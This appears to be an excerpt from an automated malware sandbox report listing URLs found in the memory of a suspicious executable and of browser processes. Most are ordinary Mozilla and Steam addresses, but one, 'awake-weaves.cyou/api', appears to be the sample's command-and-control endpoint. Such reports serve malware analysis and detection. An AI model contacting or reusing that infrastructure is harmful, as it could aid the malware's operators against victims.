Source: PK13K1G.exe, 00000008.00000003.2549488935.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2550286086.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551989010.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: PK13K1G.exe, 00000008.00000003.2549488935.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2550286086.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551989010.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: PK13K1G.exe, 00000008.00000003.2549488935.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2550286086.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551989010.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: firefox.exe, 00000017.00000002.2622599068.000001324937C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2621608217.0000013248F7D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 00000017.00000002.2622599068.000001324937C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2621608217.0000013248F7D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%s
Source: firefox.exe, 00000017.00000002.2622599068.000001324937C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%sgecko.handlerService.defaultHandlersVersionhttp://compose.mail.
Source: firefox.exe, 00000017.00000002.2654959105.000001324EB17000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/2005/app-update
Source: firefox.exe, 00000017.00000002.2654959105.000001324EB17000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/2005/app-updatechrome://branding/locale/brand.propertiesPREF_APP_UPDATE_NOTIF
Source: firefox.exe, 00000017.00000002.2688659391.0000013250417000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/2005/app-updatex
Source: firefox.exe, 00000017.00000002.2627287813.000001324A741000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2649608370.000001324D983000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2649608370.000001324D9F0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2622599068.00000132493AB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2622599068.0000013249368000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2622599068.00000132493A3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2622599068.0000013249363000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2649608370.000001324D99F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2635766369.000001324D003000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2622599068.00000132493DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000036.00000003.2956444225.0000028719AE8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000036.00000003.3138059983.0000028710DD3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000036.00000003.2788453333.0000028710363000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000036.00000003.2787450076.0000028710DE3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000036.00000003.3139423876.0000028710D10000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: firefox.exe, 00000017.00000002.2622599068.000001324937C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://extensions/content/schemas/not
Source: firefox.exe, 00000017.00000002.2622599068.000001324937C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://global/content/elements/moz-su
Source: firefox.exe, 00000017.00000002.2622599068.000001324937C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulcreateNotificationMessageElement/setAle
Source: firefox.exe, 00000017.00000002.2622599068.0000013249346000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource:///modules/sessionstore/Sessio
Source: firefox.exe, 00000017.00000002.2654959105.000001324EB17000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource://services-settings/remote-set
Source: firefox.exe, 00000017.00000002.2622599068.000001324937C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulsrc=image
Source: PK13K1G.exe, 00000008.00000003.2549488935.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551989010.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: firefox.exe, 00000017.00000002.2701121751.0000013254EC2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2656770840.000001324EDF8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: firefox.exe, 00000017.00000002.2701121751.0000013254EC2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2656770840.000001324EDF8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://%LOCALE%.malware-error.mozilla.com/?url=
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://%LOCALE%.phish-error.mozilla.com/?url=
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://%LOCALE%.phish-report.mozilla.com/?url=
Source: firefox.exe, 00000017.00000003.2520073438.000001324CD5D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2622599068.000001324937C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2631765675.000001324CA70000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000003.2519889545.000001324CD3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.2519706393.000001324CD20000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.2519437681.000001324CB00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.2520315947.000001324CD7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.duckduckgo.com/ac/
Source: firefox.exe, 00000017.00000002.2622599068.000001324937C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.duckduckgo.com/ac/VALIDATE_ONCE_PER_SESSIONisWaitingReplyFromRemoteContentquery=
Source: firefox.exe, 00000017.00000002.2674958419.0000013250257000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://account.bellmedia.c
Source: firefox.exe, 00000017.00000002.2654959105.000001324EB3D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://account.bellmedia.ca
Source: firefox.exe, 00000017.00000002.2654959105.000001324EB3D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://account.bellmedia.cansITaskbarPreviewControllerbrowser.taskbar.previews.enable
Source: firefox.exe, 00000017.00000002.2654959105.000001324EB3D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.firefox.com
Source: firefox.exe, 00000017.00000002.2623987087.0000013249F67000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.2620149903.0000013248943000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2654959105.000001324EB3D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://accounts.firefox.com/
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://accounts.firefox.com/settings/clients
Source: firefox.exe, 00000017.00000002.2701121751.0000013254E92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.firefox.comK
Source: firefox.exe, 00000017.00000002.2689955530.00000132507E1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2687133291.00000132503CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2692330739.0000013250D93000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2607534409.0000002974FD8000.00000004.00000010.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2701121751.0000013254EB7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 00000017.00000002.2628867564.000001324B2E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/%APP%/blocked-addon/%addonID%/%addonVersion%/
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/language-tools/
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search-engines/
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search?q=%TERMS%&platform=%OS%&appver=%VERSION%
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/themes
Source: firefox.exe, 00000017.00000002.2622599068.0000013249303000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.orgaccount-connection-disconnectedtestPermissionFromPrincipalchrome://browser
Source: firefox.exe, 00000017.00000002.2622599068.0000013249303000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2653502406.000001324DED4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2655457741.000001324ECC1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2654959105.000001324EB07000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2654959105.000001324EB03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2622599068.00000132493DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ads.stickyadstv.com/firefox-etp
Source: firefox.exe, 00000017.00000002.2707167925.0000013255355000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://allegro.pl/
Source: firefox.exe, 00000017.00000002.2711393247.00002CEEA9F04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2623987087.0000013249F67000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2620149903.0000013248943000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://amazon.com
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://api.accounts.firefox.com/v1
Source: PK13K1G.exe, 00000008.00000003.2551839737.0000000000E61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://apps.apple.com/app/firefox-private-safe-browser/id989804926
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://apps.apple.com/us/app/firefox-private-network-vpn/id1489407738
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/update/3/GMP/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%OS_VER
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/update/3/SystemAddons/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL
Source: firefox.exe, 00000017.00000002.2622599068.000001324937C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2614640392.000001323D111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: firefox.exe, 00000017.00000002.2622599068.0000013249303000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2704916068.00000132550B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/update/6/Firefox/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release
Source: PK13K1G.exe, 00000008.00000003.2551989010.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: PK13K1G.exe, 00000008.00000002.2562292696.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2555567301.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2550286086.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://awake-weaves.cyou/api
Source: firefox.exe, 00000017.00000002.2711393247.00002CEEA9F04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://baidu.com
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://blocked.cdn.mozilla.net/
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://blocked.cdn.mozilla.net/%blockID%.html
Source: firefox.exe, 00000017.00000002.2620149903.00000132489AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2623987087.0000013249F67000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2620149903.0000013248943000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2607838217.000001C2B20C8000.00000004.00000800.00020000.00000000.sdmp, acdee533dd.exe, 0000001A.00000002.3105754755.000000000BCB1000.00000004.00000020.00020000.00000000.sdmp, acdee533dd.exe, 0000001A.00000002.3074070661.0000000001415000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2607531192.000002713B6C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: firefox.exe, 00000017.00000002.2620149903.00000132489AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2623987087.0000013249F67000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2620149903.0000013248943000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2607838217.000001C2B20C8000.00000004.00000800.00020000.00000000.sdmp, acdee533dd.exe, 0000001A.00000002.3105754755.000000000BCB1000.00000004.00000020.00020000.00000000.sdmp, acdee533dd.exe, 0000001A.00000002.3074070661.0000000001415000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2607531192.000002713B6C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: PK13K1G.exe, 00000008.00000003.2551839737.0000000000E61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: firefox.exe, 00000017.00000002.2648295218.000001324D76B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2658660182.000001324F0B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mo
Source: firefox.exe, 00000017.00000002.2701121751.0000013254E5C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2654959105.000001324EB3D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1539075
Source: firefox.exe, 00000017.00000002.2701121751.0000013254E5C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2654959105.000001324EB3D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1584464
Source: firefox.exe, 00000017.00000002.2701121751.0000013254E5C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2654959105.000001324EB3D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1607439
Source: firefox.exe, 00000017.00000002.2701121751.0000013254E5C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2654959105.000001324EB3D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1616739
Source: PK13K1G.exe, 00000008.00000003.2551839737.0000000000E61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
Source: PK13K1G.exe, 00000008.00000003.2551839737.0000000000E61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://checkout.steampowered.com/
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-f
Source: PK13K1G.exe, 00000008.00000003.2551839737.0000000000E61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/
Source: PK13K1G.exe, 00000008.00000003.2550179335.0000000000E5E000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000002.2565766446.0000000000E62000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551839737.0000000000E61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/pub
Source: PK13K1G.exe, 00000008.00000003.2549488935.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2550286086.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551989010.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
Source: PK13K1G.exe, 00000008.00000003.2549488935.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2550179335.0000000000E5E000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551989010.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000002.2565766446.0000000000E62000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551839737.0000000000E61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
Source: PK13K1G.exe, 00000008.00000003.2549488935.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2550179335.0000000000E5E000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551989010.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000002.2565766446.0000000000E62000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551839737.0000000000E61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
Source: PK13K1G.exe, 00000008.00000003.2549488935.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551989010.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
Source: PK13K1G.exe, 00000008.00000003.2549488935.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2550179335.0000000000E5E000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551989010.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000002.2565766446.0000000000E62000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551839737.0000000000E61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
Source: PK13K1G.exe, 00000008.00000003.2549488935.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2550179335.0000000000E5E000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551989010.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000002.2565766446.0000000000E62000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551839737.0000000000E61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
Source: PK13K1G.exe, 00000008.00000003.2549488935.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2550286086.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551989010.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: PK13K1G.exe, 00000008.00000002.2560501874.0000000000DCC000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2552449673.0000000000DCC000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2549488935.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551989010.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: PK13K1G.exe, 00000008.00000003.2549488935.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2550286086.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551989010.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: PK13K1G.exe, 00000008.00000003.2549488935.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2550286086.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551989010.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=Cx79WC7T
Source: PK13K1G.exe, 00000008.00000003.2549488935.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2550286086.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551989010.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=foEB
Source: PK13K1G.exe, 00000008.00000003.2549488935.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551989010.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
Source: PK13K1G.exe, 00000008.00000003.2549488935.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551989010.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
